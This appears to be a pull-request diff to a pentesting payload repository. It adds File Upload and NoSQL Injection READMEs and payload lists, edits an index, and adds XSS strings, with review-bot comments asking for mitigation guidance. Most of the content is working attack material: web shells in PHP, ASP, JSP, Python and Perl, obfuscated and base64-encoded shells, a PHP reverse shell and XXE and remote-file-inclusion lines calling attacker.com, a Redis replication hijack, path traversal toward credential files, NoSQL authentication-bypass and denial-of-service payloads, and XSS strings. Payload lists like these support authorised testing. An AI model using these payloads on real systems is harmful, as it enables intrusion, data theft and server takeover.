- PHP: `.php`, `.php3`, `.php4`, `.php5`, `.php7`, `.phtml`, `.phar`, `.phpt`, `.pgif`, `.pht`
- ASP: `.asp`, `.aspx`, `.asa`, `.asax`, `.ascx`, `.ashx`, `.asmx`, `.cer`, `.config`
- JSP: `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf`
- Perl: `.pl`, `.pm`, `.cgi`, `.lib`
- Python: `.py`, `.pyc`, `.pyw`
- Ruby: `.rb`, `.rbw`
- Other: `.shtml`, `.shtm`, `.phar`, `.inc`
**Script Files:**
- `.js`, `.vbs`, `.bat`, `.cmd`, `.ps1`, `.sh`
**Server Config:**
- `.htaccess`, `.htpasswd`, `.web.config`, `.conf`
## Payloads
See `file-upload-payloads.txt` for comprehensive payloads including:
- Extension bypass techniques
- Content-Type bypasses
- Magic byte manipulation
- Polyglot file examples
- Web shell payloads (PHP, ASP, JSP)
- XSS via file upload
- Path traversal in filenames
- XXE via SVG/XML uploads
- Archive-based attacks
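Review bot: `.web.config` under `**Server Config:**` has a spurious leading dot; the IIS file is `web.config`, and the payload file added in this same PR lists it correctly. `.phar` is listed under both PHP and `Other`. More substantively, `## Common Vulnerable Patterns` names the weak spots but the README gives no mitigation, and `No antivirus scanning` is the least effective control on that list; add a `## Mitigation` section covering the controls the attack vectors above actually defeat: allowlist extensions and re-validate on the server, generate the stored filename yourself (never reuse the client filename, which removes the double-extension, null-byte and path-traversal cases at once), store uploads outside the web root or serve them from a separate origin with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` so uploaded HTML/SVG cannot script against the main site, re-encode images rather than trusting magic bytes, and enforce size limits before buffering the request body.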
+652
@@ -0,0 +1,652 @@
# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested)
# ============================
# FILE EXTENSION BYPASSES
# ============================
# Double Extensions
shell.php.jpg
shell.php.png
shell.php.gif
shell.php.pdf
shell.php.txt
shell.jpg.php
shell.png.php
exploit.asp.jpg
exploit.aspx.png
backdoor.jsp.gif
# Case Variations
shell.PHP
shell.PhP
shell.pHp
shell.Php
shell.PHp
shell.ASP
shell.ASPX
shell.AsP
shell.JSP
# Null Byte Injection (older systems)
shell.php%00.jpg
shell.php%00.png
shell.php\x00.jpg
shell.asp%00.gif
exploit.jsp%00.pdf
# Special Characters
shell.php.....
shell.php%20
shell.php%0a
shell.php%00
shell.php%0d%0a
shell.php::$DATA
shell.php::$INDEX_ALLOCATION
# Alternate Extensions (PHP)
shell.php3
shell.php4
shell.php5
shell.php7
shell.phtml
shell.phar
shell.phpt
shell.pgif
shell.pht
shell.inc
shell.hphp
shell.ctp
# Alternate Extensions (ASP/ASPX)
shell.asp
shell.aspx
shell.asa
shell.asax
shell.ascx
shell.ashx
shell.asmx
shell.cer
shell.config
shell.soap
shell.rem
# Alternate Extensions (JSP)
shell.jsp
shell.jspx
shell.jsw
shell.jsv
shell.jspf
# Other Language Extensions
shell.pl
shell.pm
shell.cgi
shell.py
shell.pyc
shell.rb
shell.rbw
shell.sh
shell.bash
# Executable Extensions
malware.exe
backdoor.bat
script.cmd
payload.ps1
reverse.sh
# Server Config Files
.htaccess
.htpasswd
web.config
httpd.conf
.user.ini
php.ini
# ============================
# CONTENT-TYPE BYPASSES
# ============================
# Common Content-Type Headers to Test:
# Legitimate looking but with malicious content
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
Content-Type: image/bmp
Content-Type: image/svg+xml
Content-Type: application/pdf
Content-Type: application/zip
Content-Type: text/plain
Content-Type: text/csv
Content-Type: application/octet-stream
Content-Type: video/mp4
Content-Type: audio/mpeg
# Empty or null
Content-Type:
Content-Type: null
Content-Type: undefined
# Malformed
Content-Type: image/jpeg; charset=binary
Content-Type: multipart/form-data; boundary=something
# ============================
# MAGIC BYTES (File Signatures)
# ============================
# PHP Web Shell with JPEG Header
FF D8 FF E0 (JPEG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PNG Header
89 50 4E 47 0D 0A 1A 0A (PNG magic bytes)
<?php system($_GET['cmd']); ?>
# PHP Web Shell with GIF Header
GIF89a
<?php system($_GET['cmd']); ?>
# PHP Web Shell with PDF Header
%PDF-1.4
<?php system($_GET['cmd']); ?>
# PHP Web Shell with ZIP Header
PK (ZIP magic bytes)
<?php system($_GET['cmd']); ?>
# ============================
# POLYGLOT FILES (Valid Image + Valid Code)
# ============================
# GIF + PHP Polyglot
GIF89a<?php system($_GET['cmd']); ?>
# JPEG + PHP Polyglot (with comment)
# Add PHP code in JPEG comment section
# Use exiftool: exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# PNG + PHP Polyglot
# Use PNG ancillary chunks to hide PHP code
# BMP + PHP Polyglot
# BMP header followed by PHP code in pixel data
# ============================
# WEB SHELL PAYLOADS
# ============================
# === PHP Web Shells ===
# Simple PHP Shell
<?php system($_GET['cmd']); ?>
# PHP Shell with POST
<?php system($_POST['cmd']); ?>
# PHP Eval Shell
<?php eval($_REQUEST['cmd']); ?>
# PHP Passthru Shell
<?php passthru($_GET['cmd']); ?>
# PHP Exec Shell
<?php echo exec($_GET['cmd']); ?>
# PHP Shell_exec
<?php echo shell_exec($_GET['cmd']); ?>
# PHP Backdoor
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
# PHP File Manager Shell
<?php
if(isset($_GET['file'])){
echo file_get_contents($_GET['file']);
}
if(isset($_FILES['upload'])){
move_uploaded_file($_FILES['upload']['tmp_name'], $_FILES['upload']['name']);
}
?>
# PHP One-liner Shells
<?=`$_GET[x]`?>
<?=system($_GET[x]);?>
<?=shell_exec($_GET[x]);?>
<?=passthru($_GET[x]);?>
<?=exec($_GET[x]);?>
# Obfuscated PHP Shell
<?php $a=$_GET['a'];$b=$_GET['b'];$a($b);?>
<?php @eval($_POST['x']);?>
<?php @assert($_POST['x']);?>
<?php $f='sys'.'tem';$f($_GET['x']);?>
# PHP Reverse Shell
<?php
$sock=fsockopen("attacker.com",4444);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
# === ASP/ASPX Web Shells ===
# ASP Shell
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Response.Write(oScript.Exec("cmd /c " & Request.QueryString("cmd")).StdOut.ReadAll())
%>
# ASPX Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e){
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"];
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.UseShellExecute = false;
p.Start();
Response.Write(p.StandardOutput.ReadToEnd());
}
</script>
# ASPX One-liner
<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>
# === JSP Web Shells ===
# JSP Shell
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
InputStream in = p.getInputStream();
int i;
while((i = in.read()) != -1) {
out.print((char)i);
}
%>
# JSP One-liner
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
# === Python Web Shell ===
#!/usr/bin/env python
import os
import cgi
form = cgi.FieldStorage()
cmd = form.getvalue('cmd')
os.system(cmd)
# === Perl Web Shell ===
#!/usr/bin/perl
use CGI;
$q = CGI->new;
print $q->header;
print `$q->param('cmd')`;
# ============================
# XSS VIA FILE UPLOAD
# ============================
# HTML File Upload
<html>
<body>
<script>alert(document.cookie)</script>
</body>
</html>
# SVG File Upload with XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
# SVG with XSS (onload)
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
# PDF with XSS (if rendered in browser)
%PDF-1.4
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction << /S /JavaScript /JS (app.alert('XSS');) >>
>>
endobj
# XML with XSS
<?xml version="1.0"?>
<!DOCTYPE html [
<!ENTITY js "alert(document.domain)">
]>
<html>
<body>
<script>&js;</script>
</body>
</html>
# ============================
# XXE VIA FILE UPLOAD
# ============================
# SVG with XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
# XML with XXE
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
# XXE - Parameter Entity
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<foo>&exfil;</foo>
# XXE - Blind OOB
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker.com/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
# ============================
# PATH TRAVERSAL IN FILENAME
# ============================
# Directory Traversal
../../../etc/passwd
..\..\..\..\windows\system32\config\sam
....//....//....//etc/passwd
# Overwrite Important Files
../../../var/www/html/index.php
../../../.ssh/authorized_keys
../../config.php
../../../.htaccess
../../wp-config.php
# Filename with Path Traversal
../../../../tmp/shell.php
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
# ============================
# HTACCESS FILE UPLOAD
# ============================
# .htaccess to Execute PHP
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
# .htaccess to Execute All Files as PHP
AddType application/x-httpd-php .
SetHandler application/x-httpd-php
# .htaccess to Bypass Upload Restrictions
<FilesMatch "\.ph(p|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
# ============================
# WEB.CONFIG FILE UPLOAD (IIS)
# ============================
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers>
<add name="PHP_via_FastCGI"
path="*.jpg"
verb="*"
modules="FastCgiModule"
scriptProcessor="C:\PHP\php-cgi.exe"
resourceType="Unspecified" />
</handlers>
</system.webServer>
</configuration>
# ============================
# ARCHIVE-BASED ATTACKS
# ============================
# ZIP Slip - Malicious Archive
# Create zip file with: ../../../../var/www/html/shell.php
# ZIP with Symlink
# ln -s /etc/passwd passwd.txt
# zip --symlinks payload.zip passwd.txt
# TAR with Path Traversal
# tar -cf payload.tar ../../../../var/www/html/shell.php
# Zip Bomb (DoS)
# Create highly compressed file that expands to huge size
# ============================
# IMAGE METADATA INJECTION
# ============================
# EXIF Data with XSS (if displayed)
exiftool -Comment='<script>alert(1)</script>' image.jpg
# EXIF Data with PHP Code
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# IPTC Data Injection
exiftool -IPTC:Caption-Abstract='<?php eval($_POST["x"]); ?>' image.jpg
# ============================
# SERVER-SPECIFIC BYPASSES
# ============================
# Apache
shell.php.jpg (with .htaccess: AddType application/x-httpd-php .jpg)
.htaccess file to execute images as PHP
# IIS
shell.asp;.jpg
shell.asp:.jpg
web.config to execute images as ASP
# Nginx
shell.php%00.jpg (older versions)
Upload to misconfigured alias/location
# Tomcat
shell.jsp%00.jpg
shell.jspx
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# RACE CONDITION FILE UPLOAD
# ============================
# Upload file quickly and access before validation/deletion
# Technique: Concurrent upload and access requests
# Example: Upload shell.php and immediately request http://target.com/uploads/shell.php
# Use tools like Burp Suite Turbo Intruder or custom scripts to send simultaneous requests
# ============================
# FILE UPLOAD WITH SIZE BYPASS
# ============================
# Small malicious file
<?=`$_GET[0]`?>
# Compressed PHP shell
<?=`{$_GET[0]}`;
# ============================
# MIME TYPE CONFUSION
# ============================
# Upload with different MIME types
Content-Type: application/x-php
Content-Type: application/x-httpd-php
Content-Type: application/php
Content-Type: text/php
Content-Type: text/x-php
# ============================
# POLYGLOT FILES FOR MULTIPLE FORMATS
# ============================
# JPEG + JAR Polyglot (for Java apps)
# Valid JPEG and valid JAR simultaneously
# PDF + HTML Polyglot
%PDF-1.4
<html><script>alert(1)</script></html>
# GIF + JavaScript
GIF89a/*<?php
<script>alert(1)</script>
<?php */;
# ============================
# MODERN BYPASS TECHNIQUES (2023-2025)
# ============================
# Unicode Normalization
shell.php%E2%80%AE.jpg (Right-to-Left Override)
shellgpj.php (RLO character)
# Homoglyph Attacks
shell.рhр (Cyrillic р instead of Latin p)
shell.рhр
# UTF-8 BOM
<?php system($_GET['cmd']); ?>
# Long Filename DoS
# Create extremely long filename to bypass validation
# Multiple Content-Disposition
Content-Disposition: form-data; name="file"; filename="safe.jpg"
Content-Disposition: form-data; name="file"; filename="shell.php"
# Null Session (Windows)
\\127.0.0.1\c$\inetpub\wwwroot\shell.php
# Case Sensitivity Issues
ShElL.PhP
SHELL.php
Shell.PHP
# ============================
# FRAMEWORK-SPECIFIC BYPASSES
# ============================
# WordPress
wp-content/uploads/shell.php
wp-content/themes/shell.php
wp-content/plugins/shell.php
# Drupal
sites/default/files/shell.php
# Joomla
media/shell.php
images/shell.php
# Laravel
storage/app/shell.php
public/uploads/shell.php
# Django
media/uploads/shell.py
# ============================
# REMOTE FILE INCLUSION VIA UPLOAD
# ============================
# Upload file containing:
<?php include($_GET['file']); ?>
<?php require($_GET['file']); ?>
<?php include_once($_GET['file']); ?>
# Then access with:
?file=http://attacker.com/shell.txt
?file=php://input (with POST data containing PHP code)
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
# ============================
# FILE UPLOAD WITH SSRF
# ============================
# Upload file that triggers SSRF
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="http://internal-server/admin"/>
</svg>
# ============================
# DESERIALIZATION VIA FILE UPLOAD
# ============================
# PHP Phar Deserialization
# Upload malicious .phar file
# Trigger via: file_get_contents('phar://uploads/payload.phar/test.txt')
# Java Deserialization
# Upload serialized Java object
# Trigger if application deserializes uploaded files
# ============================
# EICAR TEST FILE (AV Bypass Testing)
# ============================
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
# ============================
# BINARY PAYLOAD ENCODINGS
# ============================
# Base64 Encoded Shell
<?php eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>
# Hex Encoded
<?php eval(hex2bin("73797374656d28245f4745545b27636d64275d293b")); ?>
# ROT13
<?php eval(str_rot13("flfgrz($_TRG['pzq']);")); ?>
# ============================
# ALTERNATIVE DATA STREAMS (Windows/NTFS)
# ============================
shell.php::$DATA
shell.asp::$DATA
payload.txt:hidden.php
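Review bot: The RACE CONDITION FILE UPLOAD banner is emitted twice in a row (the heading and its `# ============================` separator repeat directly after the first banner), and the `exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg` entry under IMAGE METADATA INJECTION repeats the line already given in the polyglot section at the top of this region; drop the repeated banner and one of the duplicate exiftool lines. Two other entries are mislabelled or empty: `shell.рhр` is listed twice under Homoglyph Attacks, and the UTF-8 BOM entry shows a plain `<?php system($_GET['cmd']); ?>` with no visible BOM, so without a comment saying that the three BOM bytes precede the tag (they are invisible in a text listing) the entry conveys nothing. The `# Unicode Normalization` heading is also wrong for what follows, since a Right-to-Left Override is a bidi control character rather than a normalization issue, and `# Null Session (Windows)` does not describe the UNC admin-share path beneath it; retitle both.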
+38
View File
@@ -0,0 +1,38 @@
# NoSQL Injection
## Description
NoSQL injection is a vulnerability where an attacker can inject or manipulate NoSQL queries to bypass authentication, extract data, or perform unauthorized operations. This affects databases like MongoDB, CouchDB, Redis, Cassandra, and others that don't use traditional SQL syntax.
## Common Attack Vectors
- Authentication bypass in login forms
- Data extraction through query manipulation
- MongoDB operator injection ($ne, $gt, $regex, etc.)
- JSON/BSON injection in APIs
- Redis command injection
- CouchDB view manipulation
- Elasticsearch query injection
## Testing Approach
Submit NoSQL operators, special characters, and query manipulation attempts in:
- Login forms (username/password fields)
- Search parameters
- API endpoints accepting JSON
- Query string parameters
- Cookie values
- HTTP headers
## Common Vulnerable Patterns
- Direct user input in `find()`, `findOne()` queries
- Unvalidated JSON parsing in authentication
- Improper input sanitization in MongoDB queries
- Exposed NoSQL query interfaces
## Payloads
See `nosql-injection-payloads.txt` for a comprehensive list of NoSQL injection payloads covering:
- MongoDB injection
- CouchDB injection
- Redis injection
- Cassandra injection
- Elasticsearch injection
- Authentication bypass techniques
- Data extraction methods
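Review bot: The Common Vulnerable Patterns list names where injection happens but not why, and the README carries no remediation guidance to balance the payload list: the operator payloads in `nosql-injection-payloads.txt` only work when the application passes a parsed object such as `{"$ne": null}` straight into `find()`/`findOne()` where a string was expected, so one sentence stating that root cause plus a short mitigation list (cast or schema-validate each input to the expected scalar type, reject keys beginning with `$`, and disable server-side JavaScript with `security.javascriptEnabled: false` so `$where` is unavailable) would make the page useful to defenders as well as testers. The description also says these databases "don't use traditional SQL syntax", but Cassandra's CQL is SQL-like and the Cassandra payloads in the companion file are plain quote-injection strings; reword to avoid the contradiction.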
@@ -0,0 +1,323 @@
# NoSQL Injection Payloads (2020-2025 Bug Bounty Tested)
# ============================
# MongoDB Injection Payloads
# ============================
# Authentication Bypass - JSON Format
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}}
# Authentication Bypass - URL Encoded
username[$ne]=null&password[$ne]=null
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=
username[$regex]=.*&password[$regex]=.*
username=admin&password[$ne]=
username=admin&password[$gt]=
username[$nin][]=&password[$ne]=
username[$exists]=true&password[$exists]=true
# MongoDB Operators Injection
{"$where": "sleep(5000)"}
{"$where": "this.password == 'admin'"}
{"username": {"$regex": "^admin"}}
{"username": {"$regex": "admin.*"}}
{"email": {"$regex": ".*@domain\\.com$"}}
{"role": {"$in": ["admin", "superuser"]}}
{"age": {"$gt": 0}}
{"price": {"$lt": 9999}}
{"status": {"$ne": "inactive"}}
{"verified": {"$eq": true}}
# Time-Based NoSQL Injection (MongoDB)
{"$where": "sleep(5000) || true"}
{"username": {"$regex": "^a"}, "$where": "sleep(5000)"}
';sleep(5000);'
';return true;var x='
{"username": "admin", "$where": "sleep(5000)"}
# Data Extraction - MongoDB
{"username": {"$regex": "^a"}}
{"username": {"$regex": "^ad"}}
{"username": {"$regex": "^adm"}}
{"username": {"$regex": "^admi"}}
{"username": {"$regex": "^admin"}}
{"password": {"$regex": "^[a-z]"}}
{"apiKey": {"$regex": "^.*"}}
# Boolean-Based MongoDB Injection
{"username": "admin", "password": {"$ne": "wrong"}}
{"$or": [{"username": "admin"}, {"email": "admin@test.com"}]}
{"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}
{"$nor": [{"banned": true}, {"deleted": true}]}
# MongoDB Command Injection
{"username": "admin", "$comment": "test"}
{"username": "admin", "$hint": "username_1"}
{"$orderby": {"username": 1}}
{"username": {"$type": 2}}
{"username": {"$size": 5}}
# MongoDB Operator Abuse
{"username": {"$all": ["admin"]}}
{"roles": {"$elemMatch": {"role": "admin"}}}
{"metadata": {"$exists": false}}
{"settings": {"$nin": ["disabled"]}}
# Advanced MongoDB Injection (2023-2025)
{"username": {"$expr": {"$eq": ["$username", "admin"]}}}
{"$expr": {"$gt": [{"$strLenCP": "$password"}, 0]}}
{"username": {"$jsonSchema": {}}}
{"username": "admin'; return true; var a='"}
{"username": "admin\"; return true; var a=\""}
# ============================
# CouchDB Injection Payloads
# ============================
# CouchDB View Manipulation
startkey="admin"&endkey="admin\ufff0"
startkey=["admin"]&endkey=["admin", {}]
key="admin"
keys=["admin","root","administrator"]
# CouchDB Query Injection
{"selector": {"username": {"$eq": "admin"}}}
{"selector": {"$or": [{"username": "admin"}, {"role": "admin"}]}}
{"selector": {"password": {"$gt": null}}}
{"selector": {"_id": {"$gte": null}}}
# CouchDB Mango Query Injection
{"selector": {"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}}
{"selector": {"username": {"$regex": "(?i)admin"}}}
{"selector": {"email": {"$regex": ".*@.*"}}}
# ============================
# Redis Injection Payloads
# ============================
# Redis Command Injection
\n\r\nSET key value\r\n
\n\r\nFLUSHALL\r\n
\n\r\nGET password\r\n
\n\r\nKEYS *\r\n
\n\r\nCONFIG GET *\r\n
\n\r\nCONFIG SET dir /var/www/html\r\n
\n\r\nSAVE\r\n
\n\r\nSHUTDOWN\r\n
\n\r\nSLAVEOF attacker.com 6379\r\n
# Redis Protocol Injection
*1\r\n$8\r\nFLUSHALL\r\n
*1\r\n$4\r\nKEYS\r\n$1\r\n*\r\n
*2\r\n$3\r\nGET\r\n$3\r\nkey\r\n
*3\r\n$3\r\nSET\r\n$4\r\ntest\r\n$5\r\nvalue\r\n
# Redis Lua Injection
EVAL "return redis.call('GET', 'password')" 0
EVAL "return redis.call('KEYS', '*')" 0
EVAL "redis.call('SET', 'hacked', 'true')" 0
# ============================
# Cassandra Injection Payloads
# ============================
# Cassandra CQL Injection
' OR '1'='1
admin' --
admin' /*
' ALLOW FILTERING --
' AND token(id) > token(' union select * from users --')
# ============================
# Elasticsearch Injection
# ============================
# Elasticsearch Query Injection
{"query": {"match_all": {}}}
{"query": {"wildcard": {"username": "*"}}}
{"query": {"regexp": {"password": ".*"}}}
{"query": {"prefix": {"apikey": ""}}}
{"query": {"bool": {"must_not": {"term": {"role": "guest"}}}}}
# Elasticsearch Script Injection (Groovy/Painless)
{"script": {"source": "doc['password'].value"}}
{"query": {"script_score": {"query": {"match_all": {}}, "script": {"source": "Math.random()"}}}}
# Elasticsearch Aggregation Injection
{"aggs": {"passwords": {"terms": {"field": "password", "size": 1000}}}}
{"aggs": {"users": {"terms": {"field": "username.keyword"}}}}
# ============================
# Generic NoSQL Injection
# ============================
# Array Injection
username[]=admin&password[]=password
username[$gt]=&password[$gt]=
{"username": ["$ne", null], "password": ["$ne", null]}
# Type Confusion
username=admin&password=true
username=admin&password=1
{"username": "admin", "password": true}
{"username": "admin", "password": 1}
# Null Byte Injection
admin%00
admin\x00
{"username": "admin\u0000"}
# Comment Injection
admin' // comment
admin' /* comment */
{"username": "admin' // ", "password": "pass"}
# Encoding Bypasses
{"username": {"$ne": "\u0000"}}
{"username": {"$regex": "\x2e\x2a"}}
# ============================
# Authentication Bypass Combinations (High Success Rate 2020-2025)
# ============================
# JSON POST Body
{"username": "admin", "password": {"$ne": null}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$exists": true}}
{"$or": [{"username": "admin"}, {"username": "administrator"}], "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": "^.*"}}
# URL Parameters
?username[$ne]=fake&password[$ne]=fake
?username=admin&password[$gt]=
?username[$regex]=admin&password[$ne]=fake
?username[$in][]=admin&password[$exists]=true
# Cookie Values
username=admin; password[$ne]=fake
session={"username":{"$ne":null},"password":{"$ne":null}}
# HTTP Headers
X-Username: admin
X-Password: {"$ne": ""}
Authorization: {"username": {"$ne": null}}
# ============================
# Advanced Data Extraction Techniques
# ============================
# Character-by-Character Extraction
{"username": {"$regex": "^a.*"}}
{"username": {"$regex": "^ad.*"}}
{"username": {"$regex": "^adm.*"}}
# Length-Based Extraction
{"password": {"$regex": "^.{8}$"}}
{"password": {"$regex": "^.{1,100}$"}}
# Character Set Testing
{"password": {"$regex": "^[a-z].*"}}
{"password": {"$regex": "^[A-Z].*"}}
{"password": {"$regex": "^[0-9].*"}}
# ============================
# Blind NoSQL Injection
# ============================
# Time-Based
{"$where": "sleep(5000)"}
{"$where": "this.username == 'admin' && sleep(5000)"}
{"username": "admin", "$where": "sleep(5000) || true"}
# Boolean-Based
{"username": "admin", "password": {"$regex": "^a"}}
{"username": "admin", "password": {"$regex": "^b"}}
# ============================
# NoSQL Injection Payloads for APIs
# ============================
# GraphQL-style NoSQL Injection
{"filter": {"username": {"$ne": null}}}
{"where": {"password": {"$exists": true}}}
{"match": {"role": "admin"}}
# REST API Query Parameters
?filter[username][$ne]=fake
?where[password][$exists]=true
?sort[role][$eq]=admin
# ============================
# Polyglot NoSQL Injection
# ============================
' || '1'=='1' || {"$ne":""}
admin' || true || {"$ne": null}
{"$ne": null} || '1'='1
# ============================
# Denial of Service (DoS) Payloads
# ============================
{"$where": "while(true){}"}
{"$where": "for(var i=0;i<99999999;i++){}"}
{"username": {"$regex": "^((((((((((a+)+)+)+)+)+)+)+)+)+)$"}}
# ============================
# Modern Framework-Specific Injections (2023-2025)
# ============================
# Express.js/Node.js
req.body.username[$ne]=null
req.query.password[$gt]=
req.cookies.user[$exists]=true
# Django MongoDB
{"username__ne": null, "password__ne": null}
{"username__regex": "admin"}
{"password__exists": True}
# PHP MongoDB
array("username" => array('$ne' => null))
array("password" => array('$gt' => ""))
# Python (PyMongo)
{"username": {"$ne": None}, "password": {"$ne": None}}
{"username": {"$regex": ".*admin.*", "$options": "i"}}
# ============================
# WAF/Filter Bypass Techniques
# ============================
# Unicode Bypass
{"username": {"$\u006Ee": null}}
{"username": {"\u0024ne": null}}
# Case Variation
{"username": {"$Ne": null}}
{"username": {"$NE": null}}
# Spacing/Formatting
{"username":{"$ne":null}}
{ "username" : { "$ne" : null } }
{"username" : {"$ne" : null}}
# Property Pollution
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
# ============================
# Server-Side JavaScript Injection (SSJI)
# ============================
'; return true; var dummy='
"; return true; var dummy="
'; var ret = this; return ret; var dummy='
{"$where": "function() { return true; }"}
{"$where": "obj.credits - obj.price > 0"}
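Review bot: Several payloads are repeated verbatim across sections: `username[$gt]=&password[$gt]=` appears under both Authentication Bypass - URL Encoded and Array Injection, `{"$where": "sleep(5000)"}` under both MongoDB Operators Injection and Blind NoSQL Injection, and the `^a`/`^ad`/`^adm` regex ladder under both Data Extraction - MongoDB and Character-by-Character Extraction; deduplicate so each section adds something. The `__proto__` and `constructor.prototype` entries under Property Pollution are prototype pollution, not NoSQL injection, and belong in a different category. A few entries do not match their headings: `{"username": {"$regex": "\x2e\x2a"}}` is not valid JSON because `\x` is not a JSON escape, the Django MongoDB entries are Python ORM keyword lookups (note the Python `True`) rather than anything a client submits, and the Cassandra line containing `union select * from users` tests nothing CQL-specific since CQL has neither UNION nor subqueries. Finally, a comment that every `$where` payload depends on server-side JavaScript being enabled in mongod would help readers interpret a negative result and points defenders at the setting to turn off.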
+4 -1
View File
@@ -9,8 +9,10 @@ This repository contains a complete collection of testing payloads organized by
**Injection Vulnerabilities:**
- **[SQL Injection](./SQL-Injection/)** - Database query manipulation
- **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
- **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
- **[Command Injection](./Command-Injection/)** - OS command execution
- **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
- **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
- **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
- **[Log Injection](./Log-Injection/)** - Log file manipulation
- **[XML Injection](./XML-Injection/)** - XML and XXE attacks
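Review bot: The changed Command Injection entry now reads "OS command execution & symbolic link attacks", but symlink attacks are a filesystem and race-condition issue rather than command injection; either give that directory a description that fits both or move the symlink material to where it belongs (the File Upload section added in this PR already lists `ZIP with Symlink`). The new NoSQL Injection entry names only MongoDB, Redis and CouchDB, while the NoSQL README and payload file added in this PR also cover Cassandra and Elasticsearch; align the index description with the content it points to.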
@@ -28,6 +30,7 @@ This repository contains a complete collection of testing payloads organized by
**Server-Side Vulnerabilities:**
- **[SSRF](./SSRF/)** - Server-side request forgery
- **[Deserialization](./Deserialization/)** - Insecure deserialization
- **[File Upload](./File-Upload/)** - Malicious file upload & RCE techniques
**Configuration & Design:**
- **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
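Review bot: The new File Upload index entry says "Malicious file upload & RCE techniques", but the payload file added in this PR also covers XSS, XXE, SSRF and path traversal delivered through uploaded files; widen the description (for example "upload filter bypasses and post-upload attacks") so readers looking for those classes find the section.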
+21
View File
@@ -3,14 +3,29 @@
# Basic XSS
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(123)</script>
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert("hellox worldss");</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
# Inline JavaScript XSS
'; alert(1);
')alert(1);//
# IMG tag XSS
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src=javascript:alert('XSS')>
<img src="javascript:alert('XSS')">
<img src=""javascript:alert('XSS');"">
<img src="javascript:alert(&quot;XSS&quot;)">
<img src="jAVasCrIPt:alert('XSS')">
<img src="xss" onerror="alert(1)">
